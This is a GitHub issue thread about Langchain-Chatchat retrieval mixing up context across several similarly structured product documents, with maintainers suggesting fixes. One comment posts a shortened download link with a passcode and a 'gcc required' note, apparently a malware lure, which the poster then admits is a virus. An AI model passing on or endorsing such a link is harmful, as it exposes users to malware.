### ISSUE TITLE
[BUG] 知识库上下文能力，多个文档信息串了

### ISSUE THREAD

**Issue by littleseal** [chatchat-space/Langchain-Chatchat#4917]
**问题描述 / Problem Description**
一个知识库内，包含多个相同结构的文档时。上下文就会串。
具体请看附件图片
![WechatIMG244](https://github.com/user-attachments/assets/6d503d09-e914-4764-87c0-946656dafdb5)
![WechatIMG243](https://github.com/user-attachments/assets/5317dc69-c73e-41dc-b159-537bd92a8086)

**环境信息 / Environment Information**
- Langchain-Chatchat 版本 / commit 号：0.3.1 
- 使用的模型推理框架（Xinference / Ollama / OpenAI API 等）：Xinference
- 使用的 LLM 模型：GLM-4-9B / 
- 使用的 Embedding 模型：bge-large-zh
- 使用的向量库类型 (faiss / milvus / pg_vector 等)： faiss 
- Python 版本 / Python version: 3.10
- 推理使用的硬件（GPU / CPU / MPS / NPU 等） / Inference hardware (GPU / CPU / MPS / NPU, etc.): NVIDIA GeForce 3090
- 其他相关环境信息 / Other relevant environment information:

**Comment by littleseal** [comment]
就是类似这样的文档列表。

每一个文档就是一个产品，
每一个文档内，都包含这个产品的很多属性信息，比如：茶汤、价格、优惠 等

上下文问的时候就会串

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by littleseal** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

advertise？

**Comment by w2wewwww** [comment]
> > This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed
> 
> advertise？

virus, don't open

**Comment by littleseal** [comment]
> > > This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed
> > 
> > 
> > advertise？
> 
> virus, don't open

lol, had downloaded, but I'm using macOS Sonoma, thought it's not easy to be infected.

btw, do you familiar with langchain-chatchat?

**Comment by liunux4odoo** [comment]
把 history_len 调到 0

**Comment by littleseal** [comment]
> 把 history_len 调到 0

是历史对话轮数吗？好像没用啊

![WechatIMG245](https://github.com/user-attachments/assets/d185777b-ff97-4fc4-bd79-813a162a8694)

**Comment by liunux4odoo** [comment]
看一下知识库匹配结果，以及模型框架收到的最终 messages

**Comment by littleseal** [comment]
> 看一下知识库匹配结果，以及模型框架收到的最终 messages

看了的，知识库喂给模型的片段就是错的。

对于相同结构的多篇文档，知识库在检索时会出错（上下文使用代词、或者省略主语的时候）

**Comment by liunux4odoo** [comment]
目前是直接匹配，并没有通过上下文理解代词的功能。

**Comment by arbitraryking** [comment]
第一次检索的文档里有小青柑茶汤的相关信息吗

> > 看一下知识库匹配结果，以及模型框架收到的最终 messages
> 
> 看了的，知识库喂给模型的片段就是错的。
> 
> 对于相同结构的多篇文档，知识库在检索时会出错（上下文使用代词、或者省略主语的时候）

**Comment by littleseal** [comment]
> 第一次检索的文档里有小青柑茶汤的相关信息，把对话记录和第一次检索的文档一起喂给模型应该能答对吧
> 
> > > 看一下知识库匹配结果，以及模型框架收到的最终 messages
> > 
> > 
> > 看了的，知识库喂给模型的片段就是错的。
> > 对于相同结构的多篇文档，知识库在检索时会出错（上下文使用代词、或者省略主语的时候）

1. 不一定有，因为同一个文档要被切片
2. 并不是所有时候，都要把上轮的检索结果喂给模型，因为万一我是这么问的呢？因为人类的思维有可能是跳跃的，也有可能不是跳跃的

user：介绍一下小青柑
assistant： blablabla
user：对了，你知道古树白茶的茶汤怎么样吗？

**Comment by ArronAI007** [comment]
返回的块是错误的，那是检索算法的问题，可以使用ensemble检索器，或者针对不同文件创建不同的知识库
